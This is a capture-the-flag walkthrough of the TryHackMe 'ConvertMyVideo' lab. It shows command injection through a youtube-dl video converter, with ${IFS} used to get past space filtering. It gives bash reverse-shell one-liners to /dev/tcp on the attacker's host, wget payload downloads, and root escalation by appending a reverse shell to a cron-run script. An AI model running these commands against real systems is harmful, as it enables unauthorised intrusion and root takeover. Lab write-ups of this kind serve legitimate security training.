ConvertMyVideo THM

IP

10.10.53.160

initial Nmap scan

sudo nmap -sV -sC -A -oA inital_nmap 10.10.53.160

full Nmap scan

nmap -T5 -p- -oA full_nmap 10.10.53.160

Ports

22: SSH

80 HTTP Apache 2.4.29

Port 80 HTTP

when we navigate over to http://10.10.53.160 we are greeted with the following

Lets perform some directory busting and see if we can find any hidden directories

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.53.160:80 -o dirs.txt

within the feroxbuster's results, we do find a

• /admin directory:

  • when we navigate over to the admin directory we are instructed to give a username and password, default creds didn't seem to work

Let's focus on the convertmyvideo function on the home page

we can try some command injection and catch the request through burp to see what is happening

Within our proxy let's send it over to repeater

When we send the request through repeater we can see we are getting an error sent back to us

Lets google the error results and see if this can bring anymore context

from our google search we can see the application uses

GitHub - ytdl-org/youtube-dl: Command-line program to download videos from YouTube.com and other video sitesGitHub

youtube-dl is a command-line program to download videos from youtube,

Looking through the repo we can see that youtube-dl does allow commands to be passed through

• we can perform command injection!

we are getting some results back, perhaps we can upload a bash shell and establish a reverse shell

for our bash scripts

bash -i >& /dev/tcp/10.14.45.1/9001 0>&1

well place this in rev.sh and upload it to the target machine

let's start our Python server

python3 -m http.server 8081

Now we can use burp to alter our request to the server and use wget on the target machine to download our script,

when adjusting the request I noticed replacing the white space with %20 didn't seem to work trying but ${IFS} seemed to work perfectly for white spaces

we can see the target machine downloaded our script

Now we need to set up our netcat listener

nc -lvnp 9001

from burp again we want to run our script on our target machine

Now we have a shell on the target

Privilege escalation via www-data

First, we want to stabilize our shell we can use python for this

python3 -c "import pty;pty.spawn('/bin/bash')"

From our directory busting we know there is an admin directory, not much to do off other then the user flag

lets start enumerating the system

os

cat /etc/os-release

Kernal information

cat /proc/version

• using searchsploit we found a couple of exploits we could use if gcc was installed on the target which it is not

SUID files

find / -type f -perm -04000 -ls 2>/dev/null

• nothing interesting

Cron jobs

ls -al /etc/cron* /etc/at*
crontab -l

• nothing interesting

processes running as root

ps aux | grep root

• We can see cron is running but we dont have a lot of information regarding the processes

Let's download pspy to see if any users are running commands on the target machine.

copy pspy into your working directory

cp /opt/pspy64 .

start a python server in your working directory

python3 -m http.server 8081

on our target machine let's use wget to download the file, dont forget to cd into your tmp directory

cd /tmp && wget http://10.14.45.1:8081/pspy64

give pspy64 execute permission

chmod +x pspy64

now lets run it

./pspy64

we do find

/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/clean.sh being run meaning we could modify the file and generate a shell

lets create another reverse shell by appending our bash one-liner so it executes as root

echo "bash -i >& /dev/tcp/10.14.45.1/9002 0>&1" >> /var/www/html/tmp/clean.sh

start our netcat listener

nc -lvnp 9002

Now we wait for the file to execute

Now we are root